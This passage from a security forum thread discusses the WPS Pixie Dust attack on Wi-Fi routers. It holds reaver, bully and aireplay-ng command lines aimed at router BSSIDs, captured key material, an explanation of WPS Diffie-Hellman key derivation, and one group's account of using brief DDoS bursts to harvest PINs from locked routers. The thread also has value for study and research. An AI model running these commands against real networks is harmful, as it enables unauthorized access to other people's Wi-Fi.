    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    Well, it turns out that this device also has a static PKE!
    Code:
    91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9:bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:80:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e:84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0:69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:68:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5:23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47:0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd:07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc:7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:97:e8:40:2f:9b:97:d1:7e:7e
    I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either.
    Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-60...WARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

  13. #413
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by DetmL View Post
    Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-60...WARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?
    Yeah I know about the PIN generator, but a chip based ATTACK would be more widespread and for other manufacturers as well.

  14. #414
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by DetmL View Post
    Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-60...WARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?
    You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)

  15. #415
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by soxrok2212 View Post
    You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)
    http://www.mediafire.com/download/l8b3gb98k474c3l/Pixie

  16. #416
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Awesome thanks!

  17. #417
    On some Technicolor the modified reaver recovers the pin but not the passphrase it freezes on

    [+] Running reaver with the correct pin, wait ...
    [+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
    [Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
    [Reaver Test] [+] Channel: 11
    if such thing happens use bully to recover it
    example :
    bully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx
    it worked for me

  18. #418
    Try to add -n to your reaver line
    (by the way, that is not a pixie dust issue and it should be posted somewhere else )

  19. #419
    Join Date
    2015-Jun
    Posts
    1
    What also works is running aireplay-ng to force an association with the AP while you run reaver.
    example:
    aireplay-ng -1 12 -a <BSSID OF AP> -h <MAC ADDR. OF WIFI CARD> mon0

  20. #420
    Join Date
    2015-Jun
    Posts
    3

    WPS Pixie Dust Attack (Offline WPS Attack)

    I have a TP Link router which I cannot brake. Brute forcing also doesn't work. And I have to say that this is the only router that outputs e-s1 and e-s2.
    I can see in my area about 100 devices and only this TP Link outputs e-s1 and e-s2. My other router is Arcadyan with RT2860 chipset and I can read Authkey, PKE, etc... but e-s1 and e-s2 are never displayed by reaver.
    Is there a way to force displaying e-s1 and e-s2 ?
    Pixiewps description says that Ralink chipset never generates e-s1 and e-s2 and they are always zero. How do I run pixiewps in this case?

    here is a gist with reaver output of TP LINK WR841N
    https://gist.github.com/anonymous/6184dc4f7f9fe19ef46d

  21. #421
    oh could there be progress with Atheros stuff???

  22. #422
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by wn722 View Post
    oh could there be progress with Atheros stuff???
    Maybe with the Tick Tock attack, but then again there are a lot of prerequisites for the attack to work, and it will really just optimize the regular 2011 online brute force. But you never know!

  23. #423
    Join Date
    2015-Jul
    Posts
    1
    I think this may not be the correct space to ask for help with my issue; going to make a new thread sorry! please delete
    Last edited by Gurgg; 2015-07-26 at 22:08. Reason: delete

  24. #424
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Anyone familiar with IDA Pro or binwalk or examining firmwares in general?

    I found some interesting articles and documents highlighting flaws in /dev/random in embedded systems, thought I'd share with you. If you are not experienced, you probably won't understand much of it (thats me) but from what I understand, embedded systems from before July 2012 (or maybe even after) may be potentially vulnerable as they don't have a sufficient amount of entropy after being plugged in. The problem with newer devices (not sure about older devices) is that upon reboot, they save the entropy pool through a reboot/power loss. This is why forcing/DOSing an AP so it reboots is not effective in clearing entropy pools. I'm not sure if the same feature exists in pre-2012 devices so it may be something worth looking into. Heck, its even something Dominique noted in his presentations.

    I guess one of the maintainers of /dev/random in Linux commented on his worries about the subject here: https://news.ycombinator.com/item?id=6548893

    And the whole conference is available here: https://factorable.net/weakkeys12.conference.pdf

    Whats even more intriguing about this is older hardware is more susceptible to DOS/force rebooting. The research paper explains how there were a lot of duplicate security keys used in various embedded systems, including "enterprise-grade routers from Cisco; server management cards from Dell, Hewlett-Packard, and IBM; virtual-private-network (VPN) devices; building security systems; network attached storage devices; and several kinds of consumer routers and VoIP products" (quoted from conference.pdf). This is what made them question the implementation. If there are a lot of duplicate keys, then there must not have been sufficient entropy feeding the PRNGs.

    t6_x has ventured into the realm of Atheros devices and found that in hostapd, the WPS protocol is stopped before sending the M3 message if there is not sufficient entropy.

    As you can see, there are many barriers to break, but much possibility for older devices, or maybe even newer devices if they don't include the patch released following the research. I mean, some manufacturers had zero security so anything is possible!

  25. #425
    Join Date
    2013-Jul
    Posts
    844
    To soxrok2212

    As we have noted to you in e-mails reference field experiments opening a WPS locked system - this DOS/forced rebooting does not seem to result in a total router reboot and the removal of the WPS locking mechanism. Rather it seems to affect the internal systems allowing for the collection of a small number of pins after the router is subjected to a short (15-20 sec) but intense DDOS process. Hence the WPS system always shows a locked state but small numbers of WPS pins can be collected after a DDOS and rest period. Usually approx 5 to 10 pins can be harvested every 360 seconds as a general rule.

    Furthermore this short DDOS process sometimes results in the WPS pin resetting to 12345670. We have embedded this pin retest function into the VMR-MDK process which can considerably shorten the attack time required.


    In field trials we have been getting good results from our lab variant VMR-MDK011x8 that we sent you which employs pixiedustwps1.1 and the automatic adding of any WPS pin found into the 4 stage attack process as well. However this is not a magic bullet and only a subset of routers are vulnerable to this approach.

    MTeams

  26. #426
    Join Date
    2015-Jul
    Posts
    4
    hi
    i have some question
    for offline cracking you need keywrapkey and authkey??? how u can find them???

    thanks for help!
    Last edited by lllhamedlll; 2015-07-30 at 05:54.

  27. #427
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by lllhamedlll View Post
    hi
    i have some question
    for offline cracking you need keywrapkey and authkey??? how u can find them???

    thanks for help!
    You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.

  28. #428
    Join Date
    2015-Jul
    Posts
    4
    Quote Originally Posted by soxrok2212 View Post
    You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.
    thanks... and how we can derive authkey manually?? ... before starting attack:
    we have KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)... DHkey= SHA-256(g^AB mod p)... and

    AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

    so we should know the value on the right side of equation ... so we have authkey.... right??

    i want to study about attack in details...thanks...
    Last edited by lllhamedlll; 2015-07-31 at 09:09.

  29. #429
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by lllhamedlll View Post
    thanks... and how we can derive authkey manually?? ... before starting attack:
    we have KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)... DHkey= SHA-256(g^AB mod p)... and

    AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

    so we should know the value on the right side of equation ... so we have authkey.... right??

    i want to study about attack in details...thanks...
    All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach...50FCFFCB3EC74E

    Look on page 37.

    You can also watch Dominique's video: http://video.adm.ntnu.no/pres/549931214e18d and look at his slides: http://archive.hack.lu/2014/Hacklu20...ack_on_wps.pdf

    They'll help you a lot Glad to see someone who, like me, wants to understand the attack rather than just do it

  30. #430
    Quote Originally Posted by lllhamedlll View Post
    thanks... and how we can derive authkey manually?? ... before starting attack:
    we have KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)... DHkey= SHA-256(g^AB mod p)... and

    AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

    so we should know the value on the right side of equation ... so we have authkey.... right??

    i want to study about attack in details...thanks...
    The WPS protocol uses the Diffie-Hellman key exchange which is a method of securely exchanging cryptographic keys over a public channel. The AP wants to talk to the Client but they don't want anyone else to be able to eavesdrop they conversation.

    To accomplish this, they both generate a pair of keys (a public key and a private key):

    - First the AP generates a (hopefully) random private key (A).
    - Then it generates its public key, PKe = g^A mod p, where g and p are known and described by the WPS protocol, and sends it to the Client (with M1).

    Now, it's the turn of the Client to generate its pair of keys:
    - random private key (B)
    - PKr = g^B mod p, and sends PKr to the AP (with M2).

    At this point they both have each others public key and find the 'shared secret', a common key used to set up a secure channel.

    To find the shared secret (g^(AB) mod p):
    - the AP does: shared_secret = PKr^A mod p (which is equal to g^(AB) mod p)
    - the Client does: shared_secret = PKe^B mod p (which is equal to g^(AB) mod p)

    It may seems magic at first but it's simple math.

    From this point on the WPS protocol imposes these steps:
    - DHKey = SHA-256(shared_secret)
    - KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce), DHKey is used as key for the hash function
    - AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

    where || denotes concatenation (kdf ouputs a sequence of bytes, the first 256 are for AuthKey...).

    AuthKey stands for Authentication session Key and it is, in fact, a session key.

    Now if you are thinking at something like, "I sniff packets with Wireshark and then I generate AuthKey with the data collected". No, you can't. The Diffie-Hellman key exchange does not allow eavesdropping. It all starts with the pair of keys (public and private). To get to AuthKey you need the private key of one of the two involved entities (AP or Client). So Pixiewps needs AuthKey to work, which is provided by Reaver/Bully.

    After M2 (before M3) they both have a secure channel to talk in.

    However, Reaver >= 1.3 has a feature called "Small Diffie-Hellman keys" (-S, --dh-small). Enabling this feature causes Reaver to choose a static, not random private key, specifically the number 1.

    So if we use this feauture with Reaver then the shared_secret becomes: g^(AB) mod p = PKe^B mod p = PKe mod p = PKe (g = 2, B = 1, p > 2).

    PKe is calculated as g^A mod p, meaning that, PKe mod p = PKe (< p).

    EDIT: of course you can calculate AuthKey everytime you know the private number (it doesn't have to be 1). With 1 it's just simplier.
    Last edited by wiire; 2015-08-01 at 09:46. Reason: Added more info, fixed typo

  31. #431
    Join Date
    2015-Jul
    Posts
    4

    Red face

    Quote Originally Posted by soxrok2212 View Post
    All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach...50FCFFCB3EC74E

    Look on page 37....
    Quote Originally Posted by wiire View Post
    The WPS protocol uses the Diffie-Hellman key exchange which is a method of securely exchanging cryptographic keys over a public channel. Alice wants to talk to Bob but they don't want anyone else to be able to eavesdrop they conversation....

    thanks soxrok2212 !!!

    i will study them...

    and of course thanks to wiire !!!

    i think it is not possible to explain better...

    is this the last and best attack on WPS or not?
    Last edited by lllhamedlll; 2015-08-01 at 10:27.

  32. #432
    Join Date
    2015-Aug
    Posts
    2
    Screenshot_2015-7-8-11-20.jpg
    do this scripts suppose to work on nethunter ? sorry for bad capture, couldnt do it somehow else but you see the point is i can't use either mdk3 from kali or by team musket after make install mdk3-v6
    Last edited by zen4; 2015-08-08 at 22:03.

  33. #433
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I don't know, my only pentesting platform is Kali on my laptop. You'd have to ask in the nethunter part of this forum.

  34. #434
    Join Date
    2015-Aug
    Posts
    1
    thank you very much

  35. #435
    Join Date
    2015-Aug
    Posts
    1
    Hi

    I run Reaver -i wlan0mon -c xx -b mac -K 1

    on 3 of my router I have a dlink , netgear and Belkin it work complete only find password on the older Belkin router and others its say PIN NOT FOUND

    am I doing something wrong or is this normal and this type of attack no longer works on newer router. is there anything better to try with

    Thanks

  36. #436
    Join Date
    2015-Aug
    Posts
    4
    Quote Originally Posted by wn722 View Post
    anyone tried TP-Link devices?
    I got some 740,841 and it's zip.
    im many try with Tp-Link Device and Not Luck ...
    When im playing with wireshark and looking Tp-Link chipset much use Atheros

  37. #437
    Join Date
    2015-Jul
    Posts
    4
    i can't find answer to my question anywhere... and can't message anyone in this forum... so I'm forced to ask here:
    in PBC method.... enrollee doesn't know any secret value...just press button and finish!.... so how is it possible to send M3 message or M5 or m7 message ?....it seems in this method sending this values is not necessary !

  38. #438
    From what I've seen, even a Push Button Event is still a normal Wps transaction. It still runs through the whole M1 through M8, it will just accept I think any pin you throw at it. I tested that a while ago. PBE, then with reaver I tried pin 00000000 and it went through successfully as a full Wps transaction and retrieved the psk.

  39. #439
    Join Date
    2015-Sep
    Posts
    1
    Quote Originally Posted by therookie9 View Post
    Hi

    I run Reaver -i wlan0mon -c xx -b mac -K 1

    on 3 of my router I have a dlink , netgear and Belkin it work complete only find password on the older Belkin router and others its say PIN NOT FOUND

    am I doing something wrong or is this normal and this type of attack no longer works on newer router. is there anything better to try with

    Thanks
    This means your router is invulnerable to Pixie Dust Attack

  40. #440
    Join Date
    2015-Sep
    Posts
    5
    Hi soxrok2212 !!!

    Thanks for WPS Pixie Dust Database.xls file. In cloumn F (Vulnerable?) = No . Does it means the specified chip wont Vulnerable with ( -f option) also ? or just with -K option of reaver.?

  41. #441
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by blackdream View Post
    Hi soxrok2212 !!!

    Thanks for WPS Pixie Dust Database.xls file. In cloumn F (Vulnerable?) = No . Does it means the specified chip wont Vulnerable with ( -f option) also ? or just with -K option of reaver.?
    I think you are a bit confused here, -f is ONLY for Realtek devices when E-S1 and E-S2 are not generated within the same second, or within a few seconds of the Nonce. All -f does is it runs all the possible seeds through the PRNG (seeds in this specific case are time in seconds since Epoch). -f is NOT a solution to any router, ONLY Realtek when E-S1 and E-S2 are not generated the same second, or within a few seconds of the Nonce. In the database, "No" means that the specified AP is NOT currently vulnerable to the Pixie Dust attack.

  42. #442
    Join Date
    2015-Sep
    Posts
    5
    Thank you soxrok2212 !!

  43. #443
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Just re-installed KL1.1.0a, and when trying to apt-get install, libssl-dev, libpcap-dev and libsqlite3-dev I get this..

    root@kali:~# apt-get install libssl-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    libssl-dev is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    root@kali:~# apt-get install libpcap-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    E: Unable to locate package libpcap-dev
    root@kali:~# apt-get install libsqlite3-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    E: Unable to locate package libsqlite3-dev
    root@kali:~#
    Any ideas?
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  44. #444
    Join Date
    2015-Apr
    Posts
    29
    sudo gedit /etc/apt/sources.list

    Code:

    #

    # deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

    #deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

    deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
    deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free

    deb-src http://http.kali.org/kali sana main non-free contrib
    deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

    deb http://http.kali.org/kali sana main non-free contrib

    deb http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free

    deb http://repository.spotify.com stable non-free
    and

    sudo apt-get install linux-headers-$(uname -r)

  45. #445
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    thanks Laserman75, was afraid that "sudo apt-get install linux-headers-$(uname -r)" would brake my installation since it's not the latest Kali. Same for those "sana" repos I presume? It will all work with KL1.1.0a ??

    Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

    Edit2: anyways I've installed manually and everything works beautifully..

    https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then istalled in that order..

    dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
    dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
    dpkg -i libpcap-dev_1.3.0-1_all.deb
    dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
    dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

    Nice to see mon0 again
    Last edited by Quest; 2015-10-12 at 20:30.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  46. #446
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Quest View Post
    thanks Laserman75, was afraid that "sudo apt-get install linux-headers-$(uname -r)" would brake my installation since it's not the latest Kali. Same for those "sana" repos I presume? It will all work with KL1.1.0a ??

    Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

    Edit2: anyways I've installed manually and everything works beautifully..

    https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then istalled in that order..

    dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
    dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
    dpkg -i libpcap-dev_1.3.0-1_all.deb
    dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
    dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

    Nice to see mon0 again
    So are you all set then?

  47. #447
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    yup set and happy to see 1.1.0
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  48. #448
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Quest View Post
    yup set and happy to see 1.1.0
    Awesome, I am also considering building a new rig, if i can find the money... wondering if I should go with 1.1.0 or 2.0...

  49. #449
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    strange situation we are in. The good news is; one does not prevent the other. As a main OS though... good luck with that. What were they thinking upstream worry's me abit more... Wish I'd be abit more constructive, but really I'm lost (more than usual).
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  50. #450
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I'd just like to leave a comment here, as of today, November 21, 2015, 56/96 devices reported have been confirmed vulnerable. That's 58.3%! While I assure you this is not real-world accurate as people probably don't report as many failed tests as successful test, these are still some pretty high numbers! If you manage to find more, both vulnerable and not vulnerable, please report here! Thanks! https://docs.google.com/spreadsheets...gid=2048815923

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  2. Reaver modfication for Pixie Dust Attack
    By t6_x in forum General Archive
    Replies: 81
    Last Post: 2015-05-05, 00:55
  3. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •